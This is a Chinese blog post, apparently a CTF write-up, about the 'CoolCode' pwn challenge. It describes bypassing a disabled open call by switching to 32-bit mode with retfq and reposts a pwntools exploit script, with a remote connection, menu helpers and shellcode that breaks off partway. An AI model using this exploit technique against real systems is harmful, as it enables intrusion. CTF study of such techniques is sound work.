**前言:第二次遇到侧信道攻击pwn题,禁用了open,同样需要切换32位使用open,随后利用retfq切换回来,进行rw。就可以了,这个不需要爆破,free为read,读取道bss段,rw即可,另一篇侧信道是强网杯的一道强网先锋:http://www.maxbos44k.top/index.php/archives/102/
http://www.maxbos44k.top/index.php/archives/103/。**
转载ChaMd5 exp:
from pwn import *
context.os = 'linux'
prog = './CoolCode'
p = remote("39.107.119.192 ", 9999)
def add(idx, content):
p.sendlineafter("choice :", '1')
p.sendlineafter("Index: ", str(idx))
p.sendafter("messages: ", content)
def show(idx):
p.sendlineafter("choice :", '2')
p.sendlineafter("Index: ", str(idx))
def free(idx):
p.sendlineafter("choice :", '3')
p.sendlineafter("Index: ", str(idx))
def exp():
read = '''
xor eax, eax
mov edi, eax
push 0x60
pop rdx
mov esi, 0x1010101
xor

该博客介绍了一种利用侧信道攻击的方法,通过禁用open函数并切换到32位模式来实现远程代码执行。文章中展示了如何构造payload,包括使用retfq指令进行切换,并给出了具体的Python脚本示例来执行攻击。

441

被折叠的 条评论
为什么被折叠?



